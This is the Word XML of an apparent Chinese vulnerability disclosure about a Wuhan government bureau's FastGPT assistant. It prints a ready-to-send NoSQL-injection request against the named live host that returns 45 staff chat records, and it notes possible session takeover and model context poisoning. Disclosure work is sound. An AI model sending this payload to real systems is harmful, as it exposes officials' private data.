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漏洞危害补充证明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>目标：武汉市自然资源和城乡建设局 AI 助手（ai.zrzyhcxjs.wuhan.gov.cn:9001） · FastGPT NoSQL 注入 · 取证时间 2026-10-08 · 发现/验证人：indifference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>一、漏洞与目标基本信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>受影响单位：武汉市自然资源和城乡建设局（wuhan.gov.cn 政务域名）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>漏洞系统：FastGPT 智能问答助手（自然资源业务问答）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>漏洞类型：NoSQL 注入（MongoDB 查询注入）→ 未授权访问他人聊天记录（CWE-943 / CWE-862）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>漏洞接口：POST /api/core/chat/getHistories</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>触发条件：无需登录、无需任何凭证，公网匿名可直接复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>二、验证请求（可 1:1 复现）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>POST http://ai.zrzyhcxjs.wuhan.gov.cn:9001/api/core/chat/getHistories HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Host: ai.zrzyhcxjs.wuhan.gov.cn:9001</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Content-Type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>{"shareId": {"$ne": ""}, "outLinkUid": {"$ne": ""}, "offset": 0, "pageSize": 50}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>响应：HTTP 200，服务端返回 total = 45 条聊天记录（匿名用户本无权访问其中任何一条）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>三、未授权获取的全部 45 条用户聊天记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>以下为匿名请求直接返回的他单位工作人员真实对话标题，涉及土地利用现状、基本农田图层、违法图斑认定等自然资源执法核心业务数据；含长编号的信息已脱敏。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760720" cy="29243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漏洞基本信息与验证请求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4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 漏洞基本信息与验证请求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760720" cy="29243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未授权获取45条聊天记录1-1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4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图2 未授权获取的聊天记录（第 1–12 条）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760720" cy="29243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未授权获取45条聊天记录18-34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4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图3 未授权获取的聊天记录（第 18–34 条）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760720" cy="29243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聊天记录41-45与危害说明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4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图4 聊天记录（第 41–45 条）与危害说明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>四、危害说明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>未授权数据泄露：接口无任何鉴权，攻击者可遍历全部 45 条政务工作人员的 AI 对话记录，其中包含执法图斑认定、基本农田、土地利用现状等敏感业务内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>会话接管：每条记录返回会话 ID（chatId），结合 FastGPT 同版本其他未授权接口可进一步读取对话全文（含上传的文件名与内容），并可向模型上下文投毒。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>数据链风险：对话标题中出现的个人/业务长编号（已脱敏）可被用于撞库或社工，政务人员身份与业务行为被暴露。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>影响范围：该局 AI 助手面向全局工作人员，泄露面覆盖所有使用人员；同版本 FastGPT 全国部署量大，属通用型漏洞。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